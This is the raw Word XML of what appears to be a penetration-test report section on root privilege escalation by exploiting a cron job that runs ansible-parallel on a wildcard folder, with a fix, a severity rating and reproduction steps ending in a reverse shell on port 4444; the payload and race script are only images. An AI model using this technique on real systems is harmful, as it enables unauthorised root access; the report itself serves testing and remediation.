              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="255E5C34" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Ttulo3"/>
              <w:spacing w:after="240"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="4" w:name="_Toc92992247"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve">4.1.3 Privilege Escalation – </w:t>
            </w:r>
            <w:bookmarkEnd w:id="4"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>Cron process exploitation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="300407F7" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB0FD9">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Explanation:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> Each two minutes a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> process is executed as Root (ansible-parallel). This </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> job does the following:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B256BD" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00404FAF">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve">Deletes everything in </w:t>
            </w:r>
            <w:r w:rsidRPr="00953205">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>“/opt/automation/tasks/”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00953205">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>then copies there</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> “/root/playbook_1.yml”.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45B6597E" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00404FAF">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953205">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve">Executes </w:t>
            </w:r>
            <w:r w:rsidRPr="00953205">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>“/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00953205">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00953205">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> -c /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00953205">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00953205">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/local/bin/ansible-parallel /opt/automation/tasks/*.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00953205">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>yml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00953205">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve">”. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F93FF86" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00404FAF">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve">As a result of the previous command each </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>yml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> file is executed with “ansible-playbook” </w:t>
            </w:r>
            <w:r w:rsidRPr="001E0809">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>“/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001E0809">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001E0809">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/bin/python3 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001E0809">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001E0809">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BBEC631" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/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BC1A7B" wp14:editId="3950CC6E">
                  <wp:extent cx="5632450" cy="878205"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="22" name="Imagen 22" descr="Interfaz de usuario gráfic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Interfaz de usuario gráfica&#10;&#10;Descripción generada automáticamente con confianza media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6323A" w14:textId="77777777" w:rsidR="00404FA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>
              <w:t xml:space="preserve"> Cron job inspected with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>pspy64</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1E818841" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00B445C6" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve">Placing a malicious </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>yml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve"> file in “/opt/automation/tasks” in the right moment, will result in this file getting executed with elevated privileges (it is important to </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>take into account</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve"> the race condition that exists as the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve"> job firstly deletes everything in the folder)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A54ED64" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00953205" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB0FD9">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Vulnerability Fix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve">: Avoid using wildcards to specify a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> job argument that is run as root.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="572415FB" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:color="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB0FD9">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB0FD9">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:color="FF0000"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E6C134E" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00AB0FD9" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Roboto Regular" w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB0FD9">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Steps to reproduce the attack:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="332D5800" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="192" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve">Create a malicious </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>yml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve"> file with the following content:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D95C878" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:keepNext/>
              <w:spacing w:line="19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BF7971" wp14:editId="2BA2C9F4">
                  <wp:extent cx="4676775" cy="1390650"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="27" name="Imagen 27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Texto&#10;&#10;Descripción generada automá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8A6F2" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Descripcin"/>
              <w:jc w:val="center"/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>
              <w:t xml:space="preserve"> Malicious </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>yml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6669556C" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D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bash script to win the race condition with the following content:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71FF0352" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F2F60FD" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D7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F2A70AE" wp14:editId="3A319149">
                  <wp:extent cx="4352925" cy="1161307"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="28" name="Imagen 28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 descr="Texto&#10;&#10;Descripción generada automáticament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339" cy="116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8C205" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Descripcin"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Illustration </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> SEQ Illustration \* ARABIC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>
              <w:t xml:space="preserve"> Bash script</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60281A2C" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D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Listen on port 4444 on the attacking machine, execute the bash script in the background and wait for the incoming connection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D80FA73" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="001E0809" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58150044" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="192" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38B81F86" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="007125EF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="192" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007125EF">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Screenshot:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A9E23F6" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="192" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FD64465" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="192" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A0AC118" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="192" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="599E667F" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="004A7508" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="Ttulo3"/>
              <w:spacing w:after="240"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="5" w:name="_Toc92992248"/>
            <w:r w:rsidRPr="004A7508">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>4.1.3 Post-Exploitation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5"/>
          </w:p>
          <w:p w14:paraId="2CCEF97E" w14:textId="77777777" w:rsidR="00404FAF" w:rsidRPr="00564E26" w:rsidRDefault="00404FAF" w:rsidP="00086D73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Roboto Bold" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A7508">
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>System Proof Screenshot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6102C619" w14:textId="77777777" w:rsidR="00F923A9" w:rsidRDefault="00F923A9"/>
    <w:sectPr w:rsidR="00F92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Regular">
    <w:altName w:val="Arial"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Roboto Bold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BE7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3D21F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107"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78D63A1E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446657598">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="113668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AF"/>
    <w:rsid w:val="00263ABA"/>
    <w:rsid w:val="003A1F22"/>
    <w:rsid w:val="00404FAF"/>
    <w:rsid w:val="00753F1E"/>
    <w:rsid w:val="008C6A43"/>
    <w:rsid w:val="00930049"/>
    <w:rsid w:val="00F23DC1"/>
    <w:rsid w:val="00F437DD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4738"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0A122CA9-83BF-4FF6-846E-BBA96F17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F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Arial Unicode MS" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:bdr w:val="nil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04FAF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="24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next w:val="BodyA"/>
    <w:link w:val="Ttulo2Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00404FA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240" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:u w:color="17375E"/>
      <w:bdr w:val="nil"/>
      <w:lang w:val="en-ZA" w:eastAsia="en-ZA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4FAF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FAF"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:bdr w:val="nil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04FAF"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:u w:color="17375E"/>
      <w:bdr w:val="nil"/>
      <w:lang w:val="en-ZA" w:eastAsia="en-ZA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04FAF"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:bdr w:val="nil"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00404FAF"/>
    <w:rPr>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyA">
    <w:name w:val="Body A"/>
    <w:rsid w:val="00404FA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kern w:val="0"/>
      <w:u w:color="000000"/>
      <w:bdr w:val="nil"/>
      <w:lang w:val="en-US" w:eastAsia="en-ZA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None">
    <w:name w:val="None"/>
    <w:rsid w:val="00404FAF"/>
  </w:style>
  <w:style w:type="table" w:styleId="Tablaconcuadrcula">
    <w:name w:val="Table Grid"/>
